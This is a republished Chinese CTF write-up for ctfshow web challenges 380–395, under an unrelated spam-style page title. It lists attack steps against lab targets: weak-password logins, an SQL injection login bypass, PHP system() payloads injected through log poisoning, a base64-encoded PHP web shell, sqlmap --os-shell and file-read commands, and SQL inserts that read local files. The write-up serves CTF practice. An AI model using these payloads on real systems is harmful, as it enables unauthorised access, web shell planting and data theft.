您的位置:首页 > 文旅 > 美景 > 一级造价工程师报考条件及时间_中山平面设计公司_中文网站排行榜_正规教育培训机构

一级造价工程师报考条件及时间_中山平面设计公司_中文网站排行榜_正规教育培训机构

2024/12/23 16:46:28 来源:https://blog.csdn.net/CLAY0011/article/details/144210899  浏览:    关键词:一级造价工程师报考条件及时间_中山平面设计公司_中文网站排行榜_正规教育培训机构
一级造价工程师报考条件及时间_中山平面设计公司_中文网站排行榜_正规教育培训机构
web380

先扫目录

打开

报错了

先用伪协议去查看源码

之前扫到有flag.php

访问一下

就得到flag了

web381

查看一下源码

点击第三个css

藏在目录里面

web382

跟上题一样

不过访问这个页面是一个登录框

试一下弱口令

最后是admin

admin888

就进去了

web383

进入这个后台

用万能密码

admin' or 1=1#..

就可以进去了

web384

提示

密码前2位是小写字母,后三位是数字

用脚本生成一个字典

再用BP爆破一下

admin

xy123

web385

扫目录

访问一下

访问install/?install

默认密码是:

admin

admin888

再访问一下后台进去就行了

web386

构造payload

/clear.php?file=./install/lock.dat

清理掉之后跟上题一样

admin

admin888

就可以了

web387

扫目录,找到

/robots.txt

访问一下

/debug

file传参找到目录

/debug?file=/var/log/nginx/access.log

找到日志

<?php system('ls / >/var/www/html/1.txt');?>

rce执行一下

再访问一下

找到了目录

查看

找到文件

查看这个文件的源码

<?php system('cat /var/www/html/alsckdfy/check.php >/var/www/html/1.txt');?>

就找到flag了

web388

目录扫到有编辑器

上传一个文件

文件内容:

<?php 
system('echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOw==" | base64 -d > /var/www/html/shell.php');
?>

file传个路径上去

在跟上文件地址

显示已上传shell文件

查看目录

查看文件内容

源码中找到flag

web389

首先显示权限不足

cookies改权限

之后就和上题一样了

web390

sqlmap -u https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1 --os-shell

就得到了flag

sqlmap -u https://c68397cc-8479-4947-a7c4-edfecd468f30.challenge.ctf.show/page.php?id=1 --file-read /var/www/html/alsckdfy/check.php --batch

直接读取文件也行

web391

sqlmap -u https://8a018f60-20e9-4879-a24c-ec147c0e5a23.challenge.ctf.show/search.php?title=1 --os-shell

这题是这个输入框有sql注入漏洞

web392

和上题一样

sqlmap -u https://482a803a-36ed-45aa-b1f4-503b856dff17.challenge.ctf.show/search.php?title=1 --os-shell

不一样的是这题直接查看flag

web393

找了半天还是搜索框存在注入

https://4f174420-01b7-4271-bf73-a5f71f243eb8.challenge.ctf.show/search.php?title=1

不过这一次--os-shell跑不出来

直接--dbs

-D ctfshow -T link --columns找到

search.php?title=1';insert into link values (11,'a','file:///flag');#

然后访问link.php?id=11

得到flag

web394

前面同上

只不过加了过滤

search.php?title=1';insert into link values (11,'a','66696c653a2f2f2f7661722f7777772f68746d6c2f616c73636b6466792f636865636b2e706870');#

之后访问link.php?id=10

源码发现flag

web395

同上

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com